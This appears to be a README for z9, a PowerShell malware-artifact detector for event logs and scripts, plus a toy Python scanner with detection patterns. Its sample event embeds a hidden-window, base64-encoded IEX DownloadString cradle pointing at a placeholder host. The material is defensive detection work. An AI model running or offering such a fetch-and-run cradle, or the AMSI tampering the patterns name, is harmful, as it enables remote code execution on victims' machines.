z9 detects artifacts of PowerShell-based malware in the PowerShell event log (an XML export of the PowerShell logging events). It can also run in a static-analysis mode that takes a PowerShell script file directly.
Online Demo
```
git clone https://github.com/Sh1n0g1/z9
```
```
usage: z9.py [-h] [--output OUTPUT] [-s] [--no-viewer] [--utf8] input

positional arguments:
  input                 Input file path

options:
  -h, --help            show this help message and exit
  --output OUTPUT, -o OUTPUT
                        Output file path
  -s, --static          Enable Static Analysis mode
  --no-viewer           Disable opening the JSON viewer in a web browser
  --utf8                Read scriptfile in utf-8 (deprecated)
```
Event log mode (default):

```
python z9.py <input file> -o <output json>
python z9.py <input file> -o <output json> --no-viewer
```
| Arguments | Meaning | 
|---|---|
| input file | XML file exported from eventlog | 
| -o output json | filename of z9 result | 
| --no-viewer  | do not open the viewer | 
Example)

```
python z9.py util\log\mwpsop.xml -o sample1.json
```
Static analysis mode:

```
python z9.py <input file> -o <output json> -s
python z9.py <input file> -o <output json> -s --utf8
python z9.py <input file> -o <output json> -s --no-viewer
```
| Arguments | Meaning | 
|---|---|
| input file | PowerShell file to be analyzed | 
| -o output json | filename of z9 result | 
| -s | perform static analysis | 
| --utf8 | specify when the input file is in UTF-8 (marked deprecated in the usage output) | 
| --no-viewer  | do not open the viewer | 
Example)

```
python z9.py malware.ps1 -o sample1.json -s
```
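As an added illustration of what the two modes above consume, the following Python scanner is not z9's own code or rule set: it reads either an Event Viewer XML export of the PowerShell operational log (Event ID 4104 script block logging, the kind of input the event-log mode takes) or a raw .ps1 file (static mode), reassembles script blocks, decodes any -EncodedCommand payload (base64 of UTF-16LE) and flags a few indicators commonly seen in PowerShell malware. The rule names, the sample events, the ScriptBlockId values and the example.invalid URL are constructed for this example; how z9 itself parses the XML and which artifacts it detects are not described on this page.

```python
"""Toy PowerShell artifact scanner (added example, not z9's own code).

Event-log mode: parse an Event Viewer XML export, reassemble Event ID 4104
script blocks, and flag suspicious ones.  Static mode: run the same rules
over a raw .ps1 file.  Rule names and sample data are constructed here."""
import base64
import json
import re
import sys
import xml.etree.ElementTree as ET

EVT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = {"e": EVT_NS}

# -EncodedCommand payloads are base64 of UTF-16LE text; capture the blob.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.I)

# Hypothetical rule set: one compiled regex per indicator (illustrative only).
RULES = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "encoded_command": ENC_RE,
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "amsi_tamper": re.compile(r"AmsiUtils|amsiInitFailed", re.I),
    "reflection_load": re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I),
}

# Constructed sample input in the Event Viewer "Save All Events As (XML)" shape:
# a benign block, a hidden-window encoded download cradle, and a 4103 event
# that the parser must skip.  URL and ScriptBlockId values are made up.
SAMPLE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_CMD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS_XML = f"""<Events>
<Event xmlns="{EVT_NS}"><System><Provider Name="Microsoft-Windows-PowerShell"/>
<EventID>4104</EventID></System><EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data><Data Name="ScriptBlockText">Get-ChildItem C:\\Users | Select-Object Name</Data>
<Data Name="ScriptBlockId">aaaa-1</Data></EventData></Event>
<Event xmlns="{EVT_NS}"><System><Provider Name="Microsoft-Windows-PowerShell"/>
<EventID>4104</EventID></System><EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data><Data Name="ScriptBlockText">powershell.exe -w hidden -enc {SAMPLE_ENCODED}</Data>
<Data Name="ScriptBlockId">bbbb-2</Data></EventData></Event>
<Event xmlns="{EVT_NS}"><System><Provider Name="Microsoft-Windows-PowerShell"/>
<EventID>4103</EventID></System><EventData><Data Name="Payload">CommandInvocation(Get-Date)</Data></EventData></Event>
</Events>"""


def script_blocks_from_xml(xml_text):
    """Return [(ScriptBlockId, text)] for every 4104 event, joining the parts
    of a multi-message block in MessageNumber order."""
    root = ET.fromstring(xml_text)
    parts = {}
    for ev in root.iter("{%s}Event" % EVT_NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4104":
            continue
        data = {d.get("Name"): (d.text or "") for d in ev.iterfind("e:EventData/e:Data", NS)}
        key = data.get("ScriptBlockId", "")
        parts.setdefault(key, []).append((int(data.get("MessageNumber", "1")), data.get("ScriptBlockText", "")))
    return [(k, "".join(t for _, t in sorted(v))) for k, v in parts.items()]


def decode_encoded_commands(text):
    """Decode every -EncodedCommand blob found in text (UTF-16LE under base64)."""
    out = []
    for m in ENC_RE.finditer(text):
        blob = m.group(1)
        try:
            out.append(base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a real payload; leave the raw match to the rules
    return out


def scan_text(text):
    """Apply the rules to a script and to any decoded payload inside it."""
    decoded = decode_encoded_commands(text)
    hits = {name for body in [text] + decoded for name, rx in RULES.items() if rx.search(body)}
    return {"hits": sorted(hits), "decoded": decoded}


def scan_eventlog_xml(xml_text):
    """Event-log mode: one finding per suspicious 4104 script block."""
    findings = []
    for sbid, body in script_blocks_from_xml(xml_text):
        result = scan_text(body)
        if result["hits"]:
            findings.append({"script_block_id": sbid, **result})
    return findings


def scan_script(ps1_text):
    """Static mode: the same rules over a raw .ps1 file."""
    return scan_text(ps1_text)


def read_text(path):
    """Read an exported XML or .ps1 file, honouring a UTF-16 or UTF-8 BOM."""
    raw = open(path, "rb").read()
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig", errors="replace")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        text = read_text(sys.argv[1])
        result = scan_script(text) if sys.argv[1].lower().endswith(".ps1") else scan_eventlog_xml(text)
    else:
        result = scan_eventlog_xml(SAMPLE_EVENTS_XML)  # run against the embedded sample
    print(json.dumps(result, indent=2))
```

Run with no arguments to scan the embedded sample; only the encoded cradle block is reported, with the decoded command attached, while the benign Get-ChildItem block and the 4103 event produce nothing. The BOM check in read_text matters in practice because Event Viewer exports and PowerShell scripts are often saved as UTF-16, which is presumably why z9 carries a --utf8 switch at all.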
To collect the event log XML that z9 reads, the util directory provides:

- util/enable_powershell_logging.reg: registry file that enables PowerShell logging
- util/collect_psevent.bat: exports the PowerShell event log; run it with "Run as Admin"
- util/log: directory where the exported XML is written

hanataro-miz
si-tm
take32457
Bigdrea6
azaberrypi
Sh1n0g1